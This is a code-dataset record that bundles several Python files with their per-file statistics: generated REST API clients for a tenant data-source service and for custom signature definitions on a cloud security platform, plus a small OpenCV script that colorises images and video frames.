tenant (str): The code of the tenancy
data_source_code (str): The code of the datasource
Keyword Args:
entity_codes (str): A series of query parameter used to filter the data for a datasource. This represents the entities for the datasource. E.g.: entityCodes=ACCOUNT&entityCodes=FUNDS. [optional]
entity_keys (str): A series of query parameter used to filter the data for a datasource. This is the entity key value for an entity selection. E.g.: entityKeys=1&entityKeys=Test2. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[DataSourceDataInstance]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tenant'] = \
tenant
kwargs['data_source_code'] = \
data_source_code
return self.v1_tenant_data_sources_data_source_code_data_get_endpoint.call_with_http_info(**kwargs)
def v1_tenant_data_sources_data_source_code_get(
self,
tenant,
data_source_code,
**kwargs
):
"""Gets a datasource # noqa: E501
Gets a datasource based on the code passed # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tenant_data_sources_data_source_code_get(tenant, data_source_code, async_req=True)
>>> result = thread.get()
Args:
tenant (str): The code of the tenancy
data_source_code (str): The code of the datasource
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DataSourceData
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tenant'] = \
tenant
kwargs['data_source_code'] = \
data_source_code
return self.v1_tenant_data_sources_data_source_code_get_endpoint.call_with_http_info(**kwargs)
def v1_tenant_data_sources_get(
self,
tenant,
**kwargs
):
"""Lists all datasources # noqa: E501
List all datasources the user has permission to see # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tenant_data_sources_get(tenant, async_req=True)
>>> result = thread.get()
Args:
tenant (str): The code of the tenancy
Keyword Args:
sort (str): The column to sort on. Append - to sort in descending order. If parameter is not given, no sorting will be done. [optional]
pagination_limit (int): Non-negative maximum number of entries to return. Default is 25. [optional]
pagination_offset (int): Non-negative number of entries to skip. Default is 0. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_content_type (str/None): force body content-type.
Default is None and content-type will be predicted by allowed
content-types and body.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
DataSourceList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_spec_property_naming'] = kwargs.get(
'_spec_property_naming', False
)
kwargs['_content_type'] = kwargs.get(
'_content_type')
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tenant'] = \
tenant
return self.v1_tenant_data_sources_get_endpoint.call_with_http_info(**kwargs)
| 38.493827
| 206
| 0.526032
| 1,834
| 18,708
| 5.115049
| 0.141767
| 0.035177
| 0.044771
| 0.036457
| 0.801301
| 0.798103
| 0.763991
| 0.753225
| 0.727428
| 0.695022
| 0
| 0.007926
| 0.39304
| 18,708
| 485
| 207
| 38.573196
| 0.81823
| 0.372728
| 0
| 0.625
| 1
| 0
| 0.233989
| 0.051685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0125
| false
| 0
| 0.0375
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
77eae25719ab65656ce734a3c195ad7edd6fa5bd
| 2,364
|
py
|
Python
|
helper.py
|
RashadGarayev/ColorizeImage
|
a4364c5be300d6d2dce3bdc32037333640eeeb75
|
[
"MIT"
] | null | null | null |
helper.py
|
RashadGarayev/ColorizeImage
|
a4364c5be300d6d2dce3bdc32037333640eeeb75
|
[
"MIT"
] | null | null | null |
helper.py
|
RashadGarayev/ColorizeImage
|
a4364c5be300d6d2dce3bdc32037333640eeeb75
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
def _load_colorization_net():
    """Load the Caffe colorization model and wire in the ab cluster centers.

    NOTE(review): this reads the model files from disk on every call (the
    original reloaded them per image AND per video frame); consider caching
    the net at module level if frame throughput matters.
    """
    net = cv2.dnn.readNetFromCaffe('models/colorization_deploy_v2.prototxt',
                                   'models/colorization_release_v2.caffemodel')
    pts = np.load('models/pts_in_hull.npy')
    class8 = net.getLayerId("class8_ab")
    conv8 = net.getLayerId("conv8_313_rh")
    pts = pts.transpose().reshape(2, 313, 1, 1)
    net.getLayer(class8).blobs = [pts.astype("float32")]
    net.getLayer(conv8).blobs = [np.full([1, 313], 2.606, dtype="float32")]
    return net


def _colorize_bgr(net, bgr):
    """Colorize one BGR image with *net*; returns a uint8 BGR array of the same size.

    Pipeline: BGR -> L*a*b*, predict the ab channels from a 224x224 L channel,
    upsample ab back to the input size, recombine with the original-resolution
    L channel, convert back to BGR.  (This body was duplicated verbatim in
    both Image and ColorizeVideo.)
    """
    scaled = bgr.astype("float32") / 255.0
    lab = cv2.cvtColor(scaled, cv2.COLOR_BGR2LAB)
    resized = cv2.resize(lab, (224, 224))
    L = cv2.split(resized)[0]
    L -= 50  # center the lightness channel, as the model expects
    net.setInput(cv2.dnn.blobFromImage(L))
    ab = net.forward()[0, :, :, :].transpose((1, 2, 0))
    ab = cv2.resize(ab, (bgr.shape[1], bgr.shape[0]))
    L = cv2.split(lab)[0]
    colorized = np.concatenate((L[:, :, np.newaxis], ab), axis=2)
    colorized = cv2.cvtColor(colorized, cv2.COLOR_LAB2BGR)
    colorized = np.clip(colorized, 0, 1)
    return (255 * colorized).astype("uint8")


def Image(arg):
    """Colorize the image file at path *arg* and write tmp/colorized.jpg (281x281).

    Returns None (the original assigned cv2.imwrite's boolean to a variable
    and discarded it -- the useless assignment has been removed).
    """
    net = _load_colorization_net()
    image = cv2.imread(arg)
    colorized = _colorize_bgr(net, image)
    colorized = cv2.resize(colorized, (281, 281))
    cv2.imwrite(r'tmp/colorized.jpg', colorized)


def ColorizeVideo(frame):
    """Colorize one video *frame* (BGR array) and return the 400x400 uint8 result."""
    net = _load_colorization_net()
    frame = cv2.resize(frame, (400, 400))
    return _colorize_bgr(net, frame)
| 43.777778
| 79
| 0.635364
| 323
| 2,364
| 4.582043
| 0.229102
| 0.036486
| 0.024324
| 0.033784
| 0.825676
| 0.825676
| 0.825676
| 0.825676
| 0.825676
| 0.825676
| 0
| 0.082113
| 0.191201
| 2,364
| 54
| 80
| 43.777778
| 0.691946
| 0
| 0
| 0.745098
| 0
| 0
| 0.129387
| 0.085412
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.039216
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ae04e396ac0721a2918a1ccabb6907959fac91f
| 37,404
|
py
|
Python
|
esp_sdk/apis/custom_signature_definitions_api.py
|
zimmermanc/esp-sdk-python
|
cdef13c0dc6c3996b6c444160c71b2f1e3910c97
|
[
"MIT"
] | 6
|
2017-06-05T20:37:19.000Z
|
2019-04-10T08:43:59.000Z
|
esp_sdk/apis/custom_signature_definitions_api.py
|
zimmermanc/esp-sdk-python
|
cdef13c0dc6c3996b6c444160c71b2f1e3910c97
|
[
"MIT"
] | 18
|
2016-06-22T16:14:33.000Z
|
2018-10-29T21:53:15.000Z
|
esp_sdk/apis/custom_signature_definitions_api.py
|
zimmermanc/esp-sdk-python
|
cdef13c0dc6c3996b6c444160c71b2f1e3910c97
|
[
"MIT"
] | 18
|
2016-07-27T19:20:01.000Z
|
2020-11-17T02:09:58.000Z
|
# coding: utf-8
"""
ESP Documentation
The Evident Security Platform API (version 2.0) is designed to allow users granular control over their Amazon Web Service security experience by allowing them to review alerts, monitor signatures, and create custom signatures.
OpenAPI spec version: v2_sdk
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CustomSignatureDefinitionsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    """Store the API client, falling back to the shared Configuration's client.

    A Configuration is always instantiated first (matching the generated
    code), even when an explicit client is supplied.
    """
    config = Configuration()
    if api_client:
        self.api_client = api_client
        return
    # No client supplied: lazily create and cache one on the configuration.
    if not config.api_client:
        config.api_client = ApiClient()
    self.api_client = config.api_client
def activate(self, custom_signature_definition_id, **kwargs):
"""
Activate a Custom Signature Definition
A successful call to this API marks the definition for activation. The definition will go into the 'validating' state and will be tested before activating. The definition must have a status of editable to be activated.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.activate(custom_signature_definition_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int custom_signature_definition_id: ID of Custom Signature Definition (required)
:param str include: Related objects that can be included in the response: custom_signature, results See Including Objects for more information.
:return: CustomSignatureDefinition
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.activate_with_http_info(custom_signature_definition_id, **kwargs)
else:
(data) = self.activate_with_http_info(custom_signature_definition_id, **kwargs)
return data
def activate_with_http_info(self, custom_signature_definition_id, **kwargs):
    """Activate a Custom Signature Definition

    Marks the definition for activation: it enters the 'validating' state
    and is tested before becoming active.  The definition must have a
    status of editable.  Synchronous unless a `callback` callable is
    supplied.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int custom_signature_definition_id: ID of Custom Signature Definition (required)
    :param str include: Related objects that can be included in the response: custom_signature, results
    :return: CustomSignatureDefinition
        If the method is called asynchronously, returns the request thread.
    """
    all_params = [
        'custom_signature_definition_id', 'include',
        'callback', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]
    # Snapshot the locals and fold validated kwargs into that dict; the
    # rest of the method reads from `params`, never the local names.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method activate" % key
            )
        params[key] = val
    del params['kwargs']

    if params.get('custom_signature_definition_id') is None:
        raise ValueError("Missing the required parameter `custom_signature_definition_id` when calling `activate`")

    resource_path = '/api/v2/custom_signature_definitions/{custom_signature_definition_id}/activate.json_api'.replace('{format}', 'json_api')
    path_params = {'custom_signature_definition_id': params['custom_signature_definition_id']}
    query_params = {}
    if 'include' in params:
        query_params['include'] = params['include']
    header_params = {
        'Accept': self.api_client.select_header_accept(['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(['application/vnd.api+json']),
    }

    # No request body, form fields, file uploads or auth settings for this call.
    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CustomSignatureDefinition',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
def archive(self, custom_signature_definition_id, **kwargs):
    """Archive a Custom Signature Definition.

    A successful call archives and returns the custom signature
    definition identified by ``custom_signature_definition_id``.  The
    definition must have a status of active to be archived.

    The request is synchronous unless a ``callback`` keyword argument
    is supplied, in which case the request thread is returned and the
    callback is invoked with the response.

    :param int custom_signature_definition_id: ID of Custom Signature
        Definition (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition, or the request thread when
        called asynchronously
    """
    # Convenience wrapper: callers want only the response body, not the
    # (data, status, headers) tuple, so force that flag and delegate.
    kwargs['_return_http_data_only'] = True
    return self.archive_with_http_info(custom_signature_definition_id, **kwargs)
def archive_with_http_info(self, custom_signature_definition_id, **kwargs):
    """Archive a Custom Signature Definition, returning full HTTP info.

    Issues ``PATCH /api/v2/custom_signature_definitions/
    {custom_signature_definition_id}/archive.json_api``.  The definition
    must have a status of active to be archived.

    Synchronous unless a ``callback`` keyword is given, in which case
    the request thread is returned and the callback receives the
    response.

    :param int custom_signature_definition_id: ID of Custom Signature
        Definition (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when the required parameter is None
    """
    all_params = ['custom_signature_definition_id', 'include',
                  'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Fold keyword arguments into one dict, rejecting unknown names up front.
    params = {'custom_signature_definition_id': custom_signature_definition_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method archive" % key
            )
        params[key] = val
    if params['custom_signature_definition_id'] is None:
        raise ValueError("Missing the required parameter `custom_signature_definition_id` when calling `archive`")

    resource_path = '/api/v2/custom_signature_definitions/{custom_signature_definition_id}/archive.json_api'
    path_params = {'custom_signature_definition_id': params['custom_signature_definition_id']}
    query_params = {}
    if 'include' in params:
        query_params['include'] = params['include']
    # Both request and response bodies use the JSON API media type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/vnd.api+json']),
    }

    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CustomSignatureDefinition',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
def create(self, custom_signature_id, **kwargs):
    """Create a Custom Signature Definition.

    The request is synchronous unless a ``callback`` keyword argument
    is supplied, in which case the request thread is returned and the
    callback is invoked with the response.

    :param int custom_signature_id: ID of the custom signature this
        definition belongs to (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition, or the request thread when
        called asynchronously
    """
    # Convenience wrapper: callers want only the response body, not the
    # (data, status, headers) tuple, so force that flag and delegate.
    kwargs['_return_http_data_only'] = True
    return self.create_with_http_info(custom_signature_id, **kwargs)
def create_with_http_info(self, custom_signature_id, **kwargs):
    """Create a Custom Signature Definition, returning full HTTP info.

    Issues ``POST /api/v2/custom_signature_definitions.json_api`` with
    the owning custom signature id sent as a form field.

    Synchronous unless a ``callback`` keyword is given, in which case
    the request thread is returned and the callback receives the
    response.

    :param int custom_signature_id: ID of the custom signature this
        definition belongs to (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when the required parameter is None
    """
    all_params = ['custom_signature_id', 'include',
                  'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Fold keyword arguments into one dict, rejecting unknown names up front.
    params = {'custom_signature_id': custom_signature_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create" % key
            )
        params[key] = val
    if params['custom_signature_id'] is None:
        raise ValueError("Missing the required parameter `custom_signature_id` when calling `create`")

    resource_path = '/api/v2/custom_signature_definitions.json_api'
    query_params = {}
    if 'include' in params:
        query_params['include'] = params['include']
    # The owning signature id travels in the form body, not the path.
    form_params = [('custom_signature_id', params['custom_signature_id'])]
    # Both request and response bodies use the JSON API media type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/vnd.api+json']),
    }

    return self.api_client.call_api(resource_path, 'POST',
                                    {},
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=form_params,
                                    files={},
                                    response_type='CustomSignatureDefinition',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
def delete(self, id, **kwargs):
    """Delete a Custom Signature Definition.

    The request is synchronous unless a ``callback`` keyword argument
    is supplied, in which case the request thread is returned and the
    callback is invoked with the response.

    :param int id: Custom Signature Definition ID (required)
    :param callback: optional function invoked with the response
    :return: Meta, or the request thread when called asynchronously
    """
    # Convenience wrapper: callers want only the response body, not the
    # (data, status, headers) tuple, so force that flag and delegate.
    kwargs['_return_http_data_only'] = True
    return self.delete_with_http_info(id, **kwargs)
def delete_with_http_info(self, id, **kwargs):
    """Delete a Custom Signature Definition, returning full HTTP info.

    Issues ``DELETE /api/v2/custom_signature_definitions/{id}.json_api``.

    Synchronous unless a ``callback`` keyword is given, in which case
    the request thread is returned and the callback receives the
    response.

    :param int id: Custom Signature Definition ID (required)
    :param callback: optional function invoked with the response
    :return: Meta
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when the required parameter is None
    """
    all_params = ['id',
                  'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Fold keyword arguments into one dict, rejecting unknown names up front.
    params = {'id': id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete" % key
            )
        params[key] = val
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `delete`")

    resource_path = '/api/v2/custom_signature_definitions/{id}.json_api'
    path_params = {'id': params['id']}
    # Both request and response bodies use the JSON API media type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/vnd.api+json']),
    }

    return self.api_client.call_api(resource_path, 'DELETE',
                                    path_params,
                                    {},
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='Meta',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
def list(self, **kwargs):
    """Get a list of Custom Signature Definitions.

    The request is synchronous unless a ``callback`` keyword argument
    is supplied, in which case the request thread is returned and the
    callback is invoked with the response.

    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param dict(str, str) filter: filter params for searching; equality
        searchable attributes: id, language, status, version_number;
        searchable association: custom_signature
    :param str page: page number and page size of the collection to
        return
    :param callback: optional function invoked with the response
    :return: PaginatedCollection, or the request thread when called
        asynchronously
    """
    # Convenience wrapper: callers want only the response body, not the
    # (data, status, headers) tuple, so force that flag and delegate.
    kwargs['_return_http_data_only'] = True
    return self.list_with_http_info(**kwargs)
def list_with_http_info(self, **kwargs):
    """Get a list of Custom Signature Definitions with full HTTP info.

    Issues ``PUT /api/v2/custom_signature_definitions.json_api``.
    NOTE(review): the generated client uses PUT for this list endpoint
    and sends ``filter``/``page`` as form fields rather than query
    parameters; preserved exactly as generated.

    Synchronous unless a ``callback`` keyword is given, in which case
    the request thread is returned and the callback receives the
    response.

    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param dict(str, str) filter: filter params for searching
    :param str page: page number and page size of the collection
    :param callback: optional function invoked with the response
    :return: PaginatedCollection
    :raises TypeError: on an unrecognized keyword argument
    """
    all_params = ['include', 'filter', 'page',
                  'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Fold keyword arguments into one dict, rejecting unknown names up front.
    params = {}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list" % key
            )
        params[key] = val

    resource_path = '/api/v2/custom_signature_definitions.json_api'
    query_params = {}
    if 'include' in params:
        query_params['include'] = params['include']
    # Search/pagination parameters travel in the form body.
    form_params = []
    if 'filter' in params:
        form_params.append(('filter', params['filter']))
    if 'page' in params:
        form_params.append(('page', params['page']))
    # Both request and response bodies use the JSON API media type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/vnd.api+json']),
    }

    return self.api_client.call_api(resource_path, 'PUT',
                                    {},
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=form_params,
                                    files={},
                                    response_type='PaginatedCollection',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
def show(self, id, **kwargs):
    """Show a single Custom Signature Definition.

    The request is synchronous unless a ``callback`` keyword argument
    is supplied, in which case the request thread is returned and the
    callback is invoked with the response.

    :param int id: Custom Signature Definition ID (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition, or the request thread when
        called asynchronously
    """
    # Convenience wrapper: callers want only the response body, not the
    # (data, status, headers) tuple, so force that flag and delegate.
    kwargs['_return_http_data_only'] = True
    return self.show_with_http_info(id, **kwargs)
def show_with_http_info(self, id, **kwargs):
    """Show a single Custom Signature Definition with full HTTP info.

    Issues ``GET /api/v2/custom_signature_definitions/{id}.json_api``.

    Synchronous unless a ``callback`` keyword is given, in which case
    the request thread is returned and the callback receives the
    response.

    :param int id: Custom Signature Definition ID (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when the required parameter is None
    """
    all_params = ['id', 'include',
                  'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Fold keyword arguments into one dict, rejecting unknown names up front.
    params = {'id': id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method show" % key
            )
        params[key] = val
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `show`")

    resource_path = '/api/v2/custom_signature_definitions/{id}.json_api'
    path_params = {'id': params['id']}
    query_params = {}
    if 'include' in params:
        query_params['include'] = params['include']
    # Both request and response bodies use the JSON API media type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/vnd.api+json']),
    }

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='CustomSignatureDefinition',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
def update(self, id, **kwargs):
    """Update a Custom Signature Definition.

    The request is synchronous unless a ``callback`` keyword argument
    is supplied, in which case the request thread is returned and the
    callback is invoked with the response.

    :param int id: Custom Signature Definition ID (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param str code: the code for this definition
    :param str language: the language of the definition (ruby,
        javascript)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition, or the request thread when
        called asynchronously
    """
    # Convenience wrapper: callers want only the response body, not the
    # (data, status, headers) tuple, so force that flag and delegate.
    kwargs['_return_http_data_only'] = True
    return self.update_with_http_info(id, **kwargs)
def update_with_http_info(self, id, **kwargs):
    """Update a Custom Signature Definition, returning full HTTP info.

    Issues ``PATCH /api/v2/custom_signature_definitions/{id}.json_api``
    with the updatable fields sent as form params.

    Synchronous unless a ``callback`` keyword is given, in which case
    the request thread is returned and the callback receives the
    response.

    :param int id: Custom Signature Definition ID (required)
    :param str include: related objects to embed in the response
        (custom_signature, results)
    :param str code: the code for this definition
    :param str language: the language of the definition (ruby,
        javascript)
    :param callback: optional function invoked with the response
    :return: CustomSignatureDefinition
    :raises TypeError: on an unrecognized keyword argument
    :raises ValueError: when the required parameter is None
    """
    all_params = ['id', 'include', 'code', 'language',
                  'callback', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Fold keyword arguments into one dict, rejecting unknown names up front.
    params = {'id': id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update" % key
            )
        params[key] = val
    if params['id'] is None:
        raise ValueError("Missing the required parameter `id` when calling `update`")

    resource_path = '/api/v2/custom_signature_definitions/{id}.json_api'
    path_params = {'id': params['id']}
    query_params = {}
    if 'include' in params:
        query_params['include'] = params['include']
    # Only the fields actually supplied are sent in the form body.
    form_params = []
    if 'code' in params:
        form_params.append(('code', params['code']))
    if 'language' in params:
        form_params.append(('language', params['language']))
    # Both request and response bodies use the JSON API media type.
    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/vnd.api+json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/vnd.api+json']),
    }

    return self.api_client.call_api(resource_path, 'PATCH',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=form_params,
                                    files={},
                                    response_type='CustomSignatureDefinition',
                                    auth_settings=[],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats={})
| 45.393204
| 416
| 0.594081
| 3,893
| 37,404
| 5.500385
| 0.063704
| 0.06935
| 0.067716
| 0.050437
| 0.947976
| 0.939149
| 0.933452
| 0.926447
| 0.915659
| 0.910522
| 0
| 0.000518
| 0.329564
| 37,404
| 823
| 417
| 45.44836
| 0.853372
| 0.375655
| 0
| 0.784119
| 0
| 0
| 0.183663
| 0.083851
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037221
| false
| 0
| 0.01737
| 0
| 0.109181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
